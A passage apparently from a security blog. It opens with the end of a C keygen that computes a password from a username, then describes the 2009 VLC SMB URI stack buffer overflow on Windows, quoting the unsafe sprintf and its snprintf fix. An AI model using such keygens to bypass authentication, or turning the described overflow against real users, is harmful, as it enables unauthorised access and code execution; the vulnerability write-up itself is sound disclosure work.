usage(argv[0]); char *user = (char *) argv[1]; char *pass[10]; char ch; int i = 0; long edx, edx2, edx3 = 0; long ecx; if (strlen(user) < 6) { fprintf(stderr, "Username must be more than 5 characters long\n"); exit(EXIT_FAILURE); } memset(pass, 0, sizeof(pass)); for(ch = *(char *)user; ch; ++i) { edx = 5 * ch ^ 2 * i * (edx3 + (ch ^ 0xC0C0C0C0)); ecx = ch & 0x8000001F; if (ecx < 0) ecx = ((--ecx) | 0xFFFFFFE0) + 1; edx2 = edx << ecx; ch = *(char *) (i + user + 1); edx3 = edx2 ^ 0xBADDC001; } sprintf(&pass, "%08X", edx3); fprintf(stdout, "\nUsername:\t%s\nPassword:\t%s\n", user, pass); return 0; } void usage(const char *name) { fprintf(stderr, "Usage: %s <username>\n", name); exit(EXIT_FAILURE); }
Which as you can see here:
It works!
VLC SMB URI Remote Stack Buffer Overflow
This vulnerability was disclosed on 24 June 2009 and affects VLC player up to 0.9.9a release (latest by now). Here is the vulnerable code as seen in modules/access/smb.c.
#ifdef WIN32 static void Win32AddConnection( access_t *p_access, char *psz_path, char *psz_user, char *psz_pwd, char *psz_domain ) { DWORD (*OurWNetAddConnection2)( LPNETRESOURCE, LPCTSTR, LPCTSTR, DWORD ); char psz_remote[MAX_PATH], psz_server[MAX_PATH], psz_share[MAX_PATH]; ... sprintf( psz_remote, "\\\\%s\\%s", psz_server, psz_share ); ... FreeLibrary( hdll ); } #endif // WIN32
As you can easily realize, this affects only Windows platform and it is a classic sprintf overflow in psz_remote which has size of MAX_PATH. An attacker can trick the victim into opening a malicous SMB share using VLC to execute arbitrary code. The patch that fixes this bug is:
} - sprintf( psz_remote, "\\\\%s\\%s", psz_server, psz_share ); + snprintf( psz_remote, sizeof( psz_remote ), "\\\\%s\\%s", psz_server, psz_share ); net_resource.lpRemoteName = psz_remote;